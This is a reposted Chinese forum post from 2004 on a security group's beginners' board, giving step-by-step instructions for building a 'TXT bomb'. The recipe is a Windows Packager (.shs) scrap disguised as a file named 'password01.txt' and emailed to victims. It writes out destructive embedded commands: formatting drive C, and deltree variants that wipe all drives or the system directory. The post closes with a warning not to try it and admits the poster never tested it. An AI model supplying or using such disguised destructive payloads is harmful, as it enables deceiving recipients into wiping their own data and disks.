20CN网络安全小组论坛 - 菜鸟乐园

论坛: 菜鸟乐园标题: TXT炸弹的制作[ZT]

作者: georgeju [georgeju]

论坛用户

1.创建一个只包含一个空格(为了减小文件体积)的文本文件，任意取名。
　　2.打开｛写字板文档｝，将此文件拖放入｛写字板文档｝。也可以点击记｛写字板文档｝单栏中的“插入对象”，弹出“插入对象”对话框，选中“从文件创建”，然后点击“浏览”按钮选择要插入的文件。

　　3.选中该插入对象的图标，选择菜单栏中的“编辑包对象编辑包”(如图1)。在弹出的“对象包装程序”对话框中，选择菜单栏中的“编辑命令行”，然后输入如下命令：start.exe /m format c:/q /autotest /u ，点击“确定”，此时，内容栏中会显示出命令内容。

　　4.点击外观栏中的“插入图标”按钮，会弹出一个警告对话框，确认，然后任选一个图标。

　　5.选择菜单栏中的“编辑卷标”，为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”，然后关闭此对话框。

　　6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”（在2000下的默认名为”片段”），现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出，或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。

　　7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述，“.shs”扩展名永远是隐藏的)放心地打开时，或打开文件，点击文件中的嵌入对象时触发恶意命令(弹出dos运行窗口，执行格式化命令)．如果将上面的命令替换为：start.exe /m deltree /y a:*.* c:*.* d:*.* 则是将删除对方硬盘下所有文件（盘符根据实际情况自定义）；如果替换为：start.exe /m deltree /y c:windowssystem*.* 则是删除对方c:windowssystem目录底下的所有文件．（当然大家可以改成其它的命令）

　　真的很简单，就这样一个恶意的攻击程序被弄出来了，太可怕了！

注意：千万不要尝试喔，否则文件丢失、电脑就无法启动了

我自己也没试~~~

地主发表时间: 04-02-05 09:11